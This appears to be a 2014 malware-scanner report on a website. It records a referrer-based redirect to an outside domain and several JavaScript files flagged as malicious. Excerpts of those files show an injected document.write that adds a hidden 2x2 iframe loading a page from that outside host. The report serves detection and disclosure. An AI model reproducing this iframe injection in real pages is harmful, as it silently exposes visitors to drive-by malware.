Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://thelovenesters.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: thelovenesters.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Sep 2014 08:22:25 GMT Location: http://ccselecta.it/hwed.html Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8 Content-Length: 392 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://thelovenesters.com/ | 200 OK Content-Length: 2165 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/jquery.js | 200 OK Content-Length: 57399 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/jquery.corner.js | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://thelovenesters.com/test404page.js | 404 Not Found Content-Length: 510 Content-Type: text/html | clean |
http://thelovenesters.com/js/colorbox.js | 200 OK Content-Length: 9174 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",q="on",n="x";function e(a,c){a=a?' id="'+k+a+'"':"";c=c?' style="'+c+'"':"";return b("<div"+a+c+"/>")}function p(a,b){b=b===n?m.width():m.height();return typeof a==="string"?Math.round(a.match(/%/)?b/100*parseInt(a,10):parseInt(a,10)):a}function Q(c){c=b.isFunction(c)?c.call(h):c;return a.photo||c.match(/\.(gif|png|jpg|jpeg|bmp)(?:\?([^#]*))?(?:#(\.*))?$/i)}function cb(){for(var document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/scripts.js | 200 OK Content-Length: 1924 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function lnch_p(mywidth,myheight,page,name) {
myleft = (screen.width - mywidth) / 2; mytop = (screen.height - myheight) / 2; w = window.open(page,name,'width='+mywidth+',height='+myheight+',scrollbars=1,resizable=1,menubar=0,toolbar=0,status=0,location=0,directories=0,left='+myleft+',top='+mytop); if (w.focus) w.focus(); } $(document).ready(function(){ $("#nav ul li").mouseenter(function(){ var id = $(this).attr("id"); }); $("#nav ul li").mouseleave(function(){ var id = $(this).attr("id"); $("#nav ul #"+id+" ul").css("display","none"); }); }); if(typeof sIFR == "function"){ }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ccselecta.it/hwed.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ccselecta.it/hwed.html> | ||
http://thelovenesters.com/js/jquery_style.js | 404 Not Found Content-Length: 514 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thelovenesters.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thelovenesters.com/
Result: thelovenesters.com is not infected or malware details are not published yet.
Result: thelovenesters.com is not infected or malware details are not published yet.